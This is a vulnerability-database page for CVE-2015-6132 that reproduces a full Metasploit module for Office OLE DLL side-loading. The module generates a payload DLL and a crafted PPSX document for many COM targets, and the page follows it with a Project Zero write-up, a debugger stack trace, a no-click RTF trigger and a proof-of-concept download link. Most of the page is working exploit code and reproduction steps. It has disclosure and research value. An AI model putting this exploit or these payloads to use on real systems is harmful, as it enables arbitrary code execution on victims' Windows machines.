CVE-2015-6132 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

require 'zip' require 'base64' require 'msf/core' require 'rex/ole' class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Office OLE Multiple DLL Side Loading Vulnerabilities', 'Description' => %q{ Multiple DLL side loading vulnerabilities were found in various COM components. These issues can be exploited by loading various these components as an embedded OLE object. When instantiating a vulnerable object Windows will try to load one or more DLLs from the current working directory. If an attacker convinces the victim to open a specially crafted (Office) document from a directory also containing the attacker's DLL file, it is possible to execute arbitrary code with the privileges of the target user. This can potentially result in the attacker taking complete control of the affected system. }, 'Author' => 'Yorick Koster', 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-6132'], ['CVE', '2015-6128'], ['CVE', '2015-6133'], ['CVE', '2016-0041'], ['CVE', '2016-0100'], ['CVE', '2016-3235'], ['MSB', 'MS15-132'], ['MSB', 'MS16-014'], ['MSB', 'MS16-025'], ['MSB', 'MS16-041'], ['MSB', 'MS16-070'], ['URL', 'https://securify.nl/advisory/SFY20150801/com__services_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20150805/event_viewer_snapin_multiple_dll_side_loading_vulnerabilities.html'], ['URL', 'https://securify.nl/advisory/SFY20150803/windows_authentication_ui_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20151102/shutdown_ux_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20150802/shockwave_flash_object_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20150806/ole_db_provider_for_oracle_multiple_dll_side_loading_vulnerabilities.html'], ['URL', 'https://securify.nl/advisory/SFY20150905/nps_datastore_server_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20150906/bda_mpeg2_transport_information_filter_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20151101/mapsupdatetask_task_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20150904/windows_mail_find_people_dll_side_loading_vulnerability.html'], ['URL', 'https://securify.nl/advisory/SFY20150804/microsoft_visio_multiple_dll_side_loading_vulnerabilities.html'], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'PAYLOAD' => 'windows/exec', 'CMD' => 'C:\\Windows\\System32\\calc.exe', }, 'Payload' => { 'Space' => 2048, }, 'Platform' => 'win', 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Targets' => [ [ 'All', {} ], [ 'COM+ Services / Windows Vista - 10 / Office 2007 - 2016 (MS15-132)', { 'DLL' => 'mqrt.dll', # {ecabafc9-7f19-11d2-978e-0000f8757e2a} 'CLSID' => "\xC9\xAF\xAB\xEC\x19\x7F\xD2\x11\x97\x8E\x00\x00\xF8\x75\x7E\x2A" } ], [ 'Shockwave Flash Object / Windows 10 / Office 2013 (APSB15-28)', { 'DLL' => 'spframe.dll', # {D27CDB6E-AE6D-11cf-96B8-444553540000} 'CLSID' => "\x6E\xDB\x7C\xD2\x6D\xAE\xCF\x11\x96\xB8\x44\x45\x53\x54\x00\x00" } ], [ 'Windows Authentication UI / Windows 10 / Office 2013 - 2016 (MS15-132)', { 'DLL' => 'wuaext.dll', # {D93CE8B5-3BF8-462C-A03F-DED2730078BA} 'CLSID' => "\xB5\xE8\x3C\xD9\xF8\x3B\x2C\x46\xA0\x3F\xDE\xD2\x73\x00\x78\xBA" } ], [ 'Shutdown UX / Windows 10 / Office 2016 (MS15-132)', { 'DLL' => 'wuaext.dll', # {14ce31dc-abc2-484c-b061-cf3416aed8ff} 'CLSID' => "\xDC\x31\xCE\x14\xC2\xAB\x4C\x48\xB0\x61\xCF\x34\x16\xAE\xD8\xFF" } ], [ 'MapUpdateTask Tasks / Windows 10 / Office 2016 (MS16-014)', { 'DLL' => 'phoneinfo.dll', # {B9033E87-33CF-4D77-BC9B-895AFBBA72E4} 'CLSID' => "\x87\x3E\x03\xB9\xCF\x33\x77\x4D\xBC\x9B\x89\x5A\xFB\xBA\x72\xE4" } ], [ 'Microsoft Visio 2010 / Windows 7 (MS16-070)', { 'DLL' => 'msoutls.dll', # 6C92B806-B900-4392-89F7-2ED4B4C23211} 'CLSID' => "\x06\xB8\x92\x6C\x00\xB9\x92\x43\x89\xF7\x2E\xD4\xB4\xC2\x32\x11" } ], [ 'Event Viewer Snapin / Windows Vista - 7 / Office 2007 - 2013 (MS15-132)', { 'DLL' => 'elsext.dll', # {394C052E-B830-11D0-9A86-00C04FD8DBF7} 'CLSID' => "\x2E\x05\x4C\x39\x30\xB8\xD0\x11\x9A\x86\x00\xC0\x4F\xD8\xDB\xF7" } ], [ 'OLE DB Provider for Oracle / Windows Vista - 7 / Office 2007 - 2013 (MS16-014)', { 'DLL' => 'oci.dll', # {e8cc4cbf-fdff-11d0-b865-00a0c9081c1d} 'CLSID' => "\xBF\x4C\xCC\xE8\xFF\xFD\xD0\x11\xB8\x65\x00\xA0\xC9\x08\x1C\x1D" } ], [ 'Windows Mail Find People / Windows Vista / Office 2010 (MS16-025)', { 'DLL' => 'wab32res.dll', # {32714800-2E5F-11d0-8B85-00AA0044F941} 'CLSID' => "\x00\x48\x71\x32\x5F\x2E\xD0\x11\x8B\x85\x00\xAA\x00\x44\xF9\x41" } ], [ 'NPS Datastore server / Windows Vista / Office 2010 (MS16-014)', { 'DLL' => 'iasdatastore2.dll', # {48da6741-1bf0-4a44-8325-293086c79077} 'CLSID' => "\x41\x67\xDA\x48\xF0\x1B\x44\x4A\x83\x25\x29\x30\x86\xC7\x90\x77" } ], [ 'BDA MPEG2 Transport Information Filter / Windows Vista / Office 2010 (MS16-014)', { 'DLL' => 'ehTrace.dll', # {FC772AB0-0C7F-11D3-8FF2-00A0C9224CF4} 'CLSID' => "\xB0\x2A\x77\xFC\x7F\x0C\xD3\x11\x8F\xF2\x00\xA0\xC9\x22\x4C\xF4" } ], ], 'Privileged' => false, 'DisclosureDate' => 'Dec 8 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx']), ], self.class) end def exploit if target.name == 'All' targets = @targets else targets = [ target ] end @arch.each do |a| exploit_regenerate_payload('win', a, nil) targets.each do |t| if t.name == 'All' next end print_status("Using target #{t.name}") dll_name = t['DLL'] if target.name == 'All' ppsx_name = t.name.split(/\//).first + ".ppsx" else ppsx_name = datastore['FILENAME'] end print_status("Creating the payload DLL (#{a})...") opts = {} opts[:arch] = [ a ] dll = generate_payload_dll(opts) dll_path = store_file(dll, a, dll_name) print_good("#{dll_name} stored at #{dll_path}, copy it to a remote share") print_status("Creating the PPSX file...") ppsx = get_ppsx(t['CLSID']) ppsx_path = store_file(ppsx, a, ppsx_name) print_good("#{ppsx_name} stored at #{ppsx_path}, copy it to a remote share") end end end def store_file(data, subdir, filename) ltype = "exploit.fileformat.#{self.shortname}" if ! ::File.directory?(Msf::Config.local_directory) FileUtils.mkdir_p(Msf::Config.local_directory) end subdir.gsub!(/[^a-z0-9\.\_\-]+/i, '') if ! ::File.directory?(Msf::Config.local_directory + "/" + subdir) FileUtils.mkdir_p(Msf::Config.local_directory + "/" + subdir) end if filename and not filename.empty? if filename =~ /(.*)\.(.*)/ ext = $2 fname = $1 else fname = filename end else fname = "local_#{Time.now.utc.to_i}" end fname = ::File.split(fname).last fname.gsub!(/[^a-z0-9\.\_\-]+/i, '') fname << ".#{ext}" path = File.join(Msf::Config.local_directory + "/" + subdir, fname) full_path = ::File.expand_path(path) File.open(full_path, "wb") { |fd| fd.write(data) } report_note(:data => full_path.dup, :type => "#{ltype}.localpath") full_path.dup end def create_ole(clsid) ole_tmp = Rex::Quickfile.new('ole') stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE) stm = stg.create_stream("\x01OLE10Native") stm.close directory = stg.instance_variable_get(:@directory) directory.each_entry do |entry| if entry.instance_variable_get(:@_ab) == 'Root Entry' clsid = Rex::OLE::CLSID.new(clsid) entry.instance_variable_set(:@_clsId, clsid) end end # write to disk stg.close ole_contents = File.read(ole_tmp.path) ole_tmp.close ole_tmp.unlink ole_contents end def get_ppsx(clsid) path = ::File.join(Msf::Config.data_directory, 'exploits', 'office_ole_multiple_dll_hijack.ppsx') fd = ::File.open(path, "rb") data = fd.read(fd.stat.size) fd.close ppsx = Rex::Zip::Archive.new Zip::InputStream.open(StringIO.new(data)) do |zis| while entry = zis.get_next_entry ppsx.add_file(entry.name, zis.read) end end ppsx.add_file('/ppt/embeddings/oleObject1.bin', create_ole(clsid)) ppsx.pack end end

Source: https://code.google.com/p/google-security-research/issues/detail?id=556 It is possible for an attacker to execute a DLL planting attack in Microsoft Office 2010 on Windows 7 x86 with a specially crafted OLE object. This attack also works on Office 2013 running on Windows 7 x64. Other platforms were not tested. The attached POC document "planted-mqrt.doc" contains what was originally an embedded Packager object. The CLSID for this object was changed at offset 0x2650 to be {ecabafc9-7f19-11d2-978e-0000f8757e2a} (formatted as pack(">IHHBBBBBBBB")). This object has a InProcServer32 pointing to comsvcs.dll. Specifically the CQueueAdmin object implemented in the dll. When a user opens this document and single clicks on the icon for foo.txt ole32!OleLoad is invoked on our vulnerable CLSID. This results in a call to a class factory constructor that tries eventually tries to call mqrt!MQGetPrivateComputerInformation. Because mqrt is a delay loaded dll the loader has inserted a stub to call _tailMerge_mqrt_dll on the first call of this function. This results in a kernelbase!LoadLibraryExA call vulnerable to dll planting. If the attached mqrt.dll is placed in the same directory with the planted-mqrt.doc file you should see a popup coming from this DLL being loaded from the current working directory of Word. It's worth noting that there are several other delay loaded dlls in reachable from comsvcs.dll as well. The full list is: ADVAPI32.dll API_MS_WIN_Service_Management_L1_1_0.dll API_MS_WIN_Service_Management_L2_1_0.dll API_MS_WIN_Service_winsvc_L1_1_0.dll API_MS_Win_Security_SDDL_L1_1_0.dll CLBCatQ.DLL CRYPTSP.dll MTXCLU.DLL ODBC32.dll VERSION.dll XOLEHLP.dll colbact.DLL dbghelp.dll mqrt.dll netutils.dll samcli.dll Here is the call stack from the delay loaded mqrt.dll: 0:000> kb ChildEBP RetAddr Args to Child 001b7cb4 76f15d1c 76f30924 00000460 ffffffff ntdll!KiFastSystemCallRet 001b7cb8 76f30924 00000460 ffffffff 001b7da0 ntdll!ZwMapViewOfSection+0xc 001b7d0c 76f3099a 00000460 00000000 00000000 ntdll!LdrpMapViewOfSection+0xc7 001b7da4 76f2fec4 001b7df0 001b7f00 00000000 ntdll!LdrpFindOrMapDll+0x310 001b7f24 76f325ea 001b7f84 001b7f50 00000000 ntdll!LdrpLoadDll+0x2b6 001b7f58 75188c19 003a8aac 001b7f9c 001b7f84 ntdll!LdrLoadDll+0x92 001b7f94 751890ac 00000000 00000000 003a8aac KERNELBASE!LoadLibraryExW+0x1d9 001b7fb4 70dd96c0 70e8de20 00000000 00000000 KERNELBASE!LoadLibraryExA+0x26 001b8000 70e7cb2b 00000000 70e94148 003768a0 comsvcs!__delayLoadHelper2+0x59 001b8054 70e7588e 70ea52ec 5160c47e 8007000e comsvcs!_tailMerge_mqrt_dll+0xd 001b8088 70e75c09 069d8cf8 70dd31ac 5160c442 comsvcs!CMSMQRT::Load+0x3a 001b8090 70dd31ac 5160c442 00000000 001b8114 comsvcs!CQueueAdmin::FinalConstruct+0xa 001b80b4 70dd47ef 00000000 001b9880 069d8cf8 comsvcs!ATL::CComCreator<ATL::CComObject<CQueueAdmin> >::CreateInstance+0x50 001b80c8 70dc7d08 00000000 001b9880 001b8114 comsvcs!ATL::CComCreator2<ATL::CComCreator<ATL::CComObject<CQueueAdmin> >,ATL::CComFailCreator<-2147221232> >::CreateInstance+0x18 001b80e0 765e8c86 06988358 00000000 001b9880 comsvcs!ATL::CComClassFactory::CreateInstance+0x3b 001b8168 76603170 76706444 00000000 001b94e4 ole32!CServerContextActivator::CreateInstance+0x172 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1000] 001b81a8 765e8daa 001b94e4 00000000 00414230 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917] 001b81fc 767602f1 7670646c 00000000 001b94e4 ole32!CApartmentActivator::CreateInstance+0x112 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 2268] 001b8220 767c6311 765e8d36 001b8410 00000004 RPCRT4!Invoke+0x2a 001b8628 766fd7e6 06a70490 0678a6e8 067982b8 RPCRT4!NdrStubCall2+0x2d6 001b8670 766fd876 06a70490 067982b8 0678a6e8 ole32!CStdStubBuffer_Invoke+0xb6 [d:\w7rtm\com\rpc\ndrole\stub.cxx @ 1590] 001b86b8 766fddd0 067982b8 003a877c 00000000 ole32!SyncStubInvoke+0x3c [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1187] 001b8704 76618a43 067982b8 06979020 06a70490 ole32!StubInvoke+0xb9 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1396] 001b87e0 76618938 0678a6e8 00000000 06a70490 ole32!CCtxComChnl::ContextInvoke+0xfa [d:\w7rtm\com\ole32\com\dcomrem\ctxchnl.cxx @ 1262] 001b87fc 766fa44c 067982b8 00000001 06a70490 ole32!MTAInvoke+0x1a [d:\w7rtm\com\ole32\com\dcomrem\callctrl.cxx @ 2105] 001b882c 766fdb41 d0908070 0678a6e8 06a70490 ole32!AppInvoke+0xab [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1086] 001b890c 766fe1fd 06798260 003d6098 00000000 ole32!ComInvokeWithLockAndIPID+0x372 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1724] 001b8934 76619367 06798260 00000000 06798260 ole32!ComInvoke+0xc5 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1469] 001b8948 766fe356 06798260 06798260 0039d408 ole32!ThreadDispatch+0x23 [d:\w7rtm\com\ole32\com\dcomrem\chancont.cxx @ 298] 001b895c 766fe318 06798260 001b8a64 00000000 ole32!DispatchCall+0x27 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4273] 001b8988 766fcef0 001b8a50 001b8b78 0697fd00 ole32!CRpcChannelBuffer::SwitchAptAndDispatchCall+0xa1 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4321] 001b8a68 765f9d01 0697fd00 001b8b78 001b8b60 ole32!CRpcChannelBuffer::SendReceive2+0xef [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4076] 001b8ae4 765f9b24 0697fd00 001b8b78 001b8b60 ole32!CAptRpcChnl::SendReceive+0xaf [d:\w7rtm\com\ole32\com\dcomrem\callctrl.cxx @ 603] 001b8b38 766fce06 0697fd00 001b8b78 001b8b60 ole32!CCtxComChnl::SendReceive+0x1c5 [d:\w7rtm\com\ole32\com\dcomrem\ctxchnl.cxx @ 734] 001b8b54 7675476e 06a39d34 001b8ba4 767c6753 ole32!NdrExtpProxySendReceive+0x49 [d:\w7rtm\com\rpc\ndrole\proxy.cxx @ 1932] 001b8b60 767c6753 7a61ad54 001b8fb0 0700022b RPCRT4!NdrpProxySendReceive+0xe 001b8f78 766fc8e2 7660fa10 7661484a 001b8fb0 RPCRT4!NdrClientCall2+0x1a6 001b8f98 765f98ad 00000014 00000004 001b8fc8 ole32!ObjectStublessClient+0xa2 [d:\w7rtm\com\rpc\ndrole\i386\stblsclt.cxx @ 474] 001b8fa8 765e8d1f 06a39d34 00000000 001b94e4 ole32!ObjectStubless+0xf [d:\w7rtm\com\rpc\ndrole\i386\stubless.asm @ 154] 001b8fc8 765e8aa2 76706494 00000001 00000000 ole32!CProcessActivator::CCICallback+0x6d [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1737] 001b8fe8 765e8a53 76706494 001b9340 00000000 ole32!CProcessActivator::AttemptActivation+0x2c [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1630] 001b9024 765e8e0d 76706494 001b9340 00000000 ole32!CProcessActivator::ActivateByContext+0x4f [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1487] 001b904c 76603170 76706494 00000000 001b94e4 ole32!CProcessActivator::CreateInstance+0x49 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1377] 001b908c 76602ef4 001b94e4 00000000 001b9a50 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917] 001b92ec 76603170 76706448 00000000 001b94e4 ole32!CClientContextActivator::CreateInstance+0xb0 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 685] 001b932c 76603098 001b94e4 00000000 001b9a50 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917] 001b9b04 76609e25 001b9c20 00000000 00000403 ole32!ICoCreateInstanceEx+0x404 [d:\w7rtm\com\ole32\com\objact\objact.cxx @ 1334] 001b9b64 76609d86 001b9c20 00000000 00000403 ole32!CComActivator::DoCreateInstance+0xd9 [d:\w7rtm\com\ole32\com\objact\immact.hxx @ 343] 001b9b88 76609d3f 001b9c20 00000000 00000403 ole32!CoCreateInstanceEx+0x38 [d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 157] 001b9bb8 7662154c 001b9c20 00000000 00000403 ole32!CoCreateInstance+0x37 [d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 110] 001b9c34 7661f2af ecabafc9 11d27f19 00008e97 ole32!wCreateObject+0x106 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 3046] 001b9c98 7661f1d4 053d0820 00000000 605c63a8 ole32!OleLoadWithoutBinding+0x9c [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1576] *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\office14\mso.dll - 001b9cc0 5eb283bf 053d0820 605c63a8 02397a00 ole32!OleLoad+0x37 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1495] *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Microsoft Office\Office14\wwlib.dll - WARNING: Stack unwind information not available. Following frames may be wrong. 001b9d34 60a53973 053d0820 605c63a8 02397a00 mso!Ordinal2023+0x7c 001b9d80 60a53881 036dc800 053d0820 605c63a8 wwlib!DllGetLCID+0x46e24d It is also possible to trigger this DLL load without requiring a user click by using the following RTF document: {\rtf1{\object\objemb{\*\objclass None}{\*\oleclsid \'7becabafc9-7f19-11d2-978e-0000f8757e2a\'7d}{\*\objdata 010500000100000001000000000000000000000000000000000000000000000000000000000000000000000000}}} Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38968.zip